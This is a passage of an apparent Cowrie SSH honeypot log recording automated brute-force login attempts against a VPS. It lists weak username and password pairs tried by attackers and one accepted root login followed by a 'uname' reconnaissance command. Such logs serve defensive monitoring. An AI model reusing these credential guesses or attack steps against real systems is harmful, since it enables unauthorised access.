084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T03:07:39.289425Z","src_ip":"212.227.235.229","session":"99e391fa826b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":44157,"dst_ip":"1.2.3.4","dst_port":22,"session":"99d1a37b5e50","protocol":"ssh","message":"New connection: 45.125.211.194:44157 (1.2.3.4:22) [session: 99d1a37b5e50]","sensor":"my-vps","timestamp":"2025-08-28T03:07:39.340938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:39.352126Z","src_ip":"45.125.211.194","session":"99d1a37b5e50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:07:39.573172Z","src_ip":"45.125.211.194","session":"99d1a37b5e50"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:07:40.451421Z","src_ip":"45.125.211.194","session":"99d1a37b5e50"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:41.674982Z","src_ip":"45.125.211.194","session":"99d1a37b5e50"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:42.350895Z","src_ip":"20.2.203.250","session":"622489cd9b3c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:47.043215Z","src_ip":"212.227.235.229","session":"99e391fa826b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":25136,"dst_ip":"1.2.3.4","dst_port":22,"session":"eba94da8e734","protocol":"ssh","message":"New connection: 45.125.211.194:25136 (1.2.3.4:22) [session: eba94da8e734]","sensor":"my-vps","timestamp":"2025-08-28T03:07:54.132155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:54.169399Z","src_ip":"45.125.211.194","session":"eba94da8e734"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:07:54.343907Z","src_ip":"45.125.211.194","session":"eba94da8e734"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:07:55.180182Z","src_ip":"45.125.211.194","session":"eba94da8e734"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:56.392157Z","src_ip":"45.125.211.194","session":"eba94da8e734"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58234,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dad2fd13e97","protocol":"ssh","message":"New connection: 45.125.211.194:58234 (1.2.3.4:22) [session: 4dad2fd13e97]","sensor":"my-vps","timestamp":"2025-08-28T03:08:08.866189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:08:08.871860Z","src_ip":"45.125.211.194","session":"4dad2fd13e97"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:08:09.076582Z","src_ip":"45.125.211.194","session":"4dad2fd13e97"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:08:09.913707Z","src_ip":"45.125.211.194","session":"4dad2fd13e97"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:11.126414Z","src_ip":"45.125.211.194","session":"4dad2fd13e97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46090,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e688996dfc","protocol":"ssh","message":"New connection: 212.227.235.229:46090 (1.2.3.4:22) [session: 84e688996dfc]","sensor":"my-vps","timestamp":"2025-08-28T03:08:15.343144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:08:15.356788Z","src_ip":"212.227.235.229","session":"84e688996dfc"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:08:15.455313Z","src_ip":"212.227.235.229","session":"84e688996dfc"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T03:08:16.469736Z","src_ip":"212.227.235.229","session":"84e688996dfc"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:17.573465Z","src_ip":"212.227.235.229","session":"84e688996dfc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16371,"dst_ip":"1.2.3.4","dst_port":22,"session":"93ac3b45d2c0","protocol":"ssh","message":"New connection: 45.125.211.194:16371 (1.2.3.4:22) [session: 93ac3b45d2c0]","sensor":"my-vps","timestamp":"2025-08-28T03:08:23.360090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:08:23.368170Z","src_ip":"45.125.211.194","session":"93ac3b45d2c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:08:23.617057Z","src_ip":"45.125.211.194","session":"93ac3b45d2c0"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:08:24.466817Z","src_ip":"45.125.211.194","session":"93ac3b45d2c0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:25.689800Z","src_ip":"45.125.211.194","session":"93ac3b45d2c0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16478,"dst_ip":"1.2.3.4","dst_port":22,"session":"b09a93562445","protocol":"ssh","message":"New connection: 45.125.211.194:16478 (1.2.3.4:22) [session: b09a93562445]","sensor":"my-vps","timestamp":"2025-08-28T03:08:37.912603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:08:37.914783Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:08:38.130387Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:08:38.960089Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:08:39.471331Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:08:39.472167Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:39.756851Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:39.758012Z","src_ip":"45.125.211.194","session":"b09a93562445"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":39566,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccb61f2d0d11","protocol":"ssh","message":"New connection: 194.233.79.134:39566 (1.2.3.4:22) [session: ccb61f2d0d11]","sensor":"my-vps","timestamp":"2025-08-28T03:08:46.892055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:08:46.937105Z","src_ip":"194.233.79.134","session":"ccb61f2d0d11"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:08:47.118002Z","src_ip":"194.233.79.134","session":"ccb61f2d0d11"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:08:48.590167Z","src_ip":"194.233.79.134","session":"ccb61f2d0d11"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:50.303002Z","src_ip":"194.233.79.134","session":"ccb61f2d0d11"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":14048,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3debc886465","protocol":"ssh","message":"New connection: 45.125.211.194:14048 (1.2.3.4:22) [session: f3debc886465]","sensor":"my-vps","timestamp":"2025-08-28T03:08:52.574652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:08:52.594559Z","src_ip":"45.125.211.194","session":"f3debc886465"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:08:52.789476Z","src_ip":"45.125.211.194","session":"f3debc886465"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-28T03:08:53.623519Z","src_ip":"45.125.211.194","session":"f3debc886465"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:08:54.835920Z","src_ip":"45.125.211.194","session":"f3debc886465"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51944,"dst_ip":"1.2.3.4","dst_port":22,"session":"584375ec3748","protocol":"ssh","message":"New connection: 45.125.211.194:51944 (1.2.3.4:22) [session: 584375ec3748]","sensor":"my-vps","timestamp":"2025-08-28T03:09:07.493003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:09:07.503595Z","src_ip":"45.125.211.194","session":"584375ec3748"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:09:07.708405Z","src_ip":"45.125.211.194","session":"584375ec3748"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:09:08.533362Z","src_ip":"45.125.211.194","session":"584375ec3748"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:09:09.744347Z","src_ip":"45.125.211.194","session":"584375ec3748"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":56016,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a075c50ac27","protocol":"ssh","message":"New connection: 45.125.211.194:56016 (1.2.3.4:22) [session: 0a075c50ac27]","sensor":"my-vps","timestamp":"2025-08-28T03:09:22.347960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:09:22.367224Z","src_ip":"45.125.211.194","session":"0a075c50ac27"}
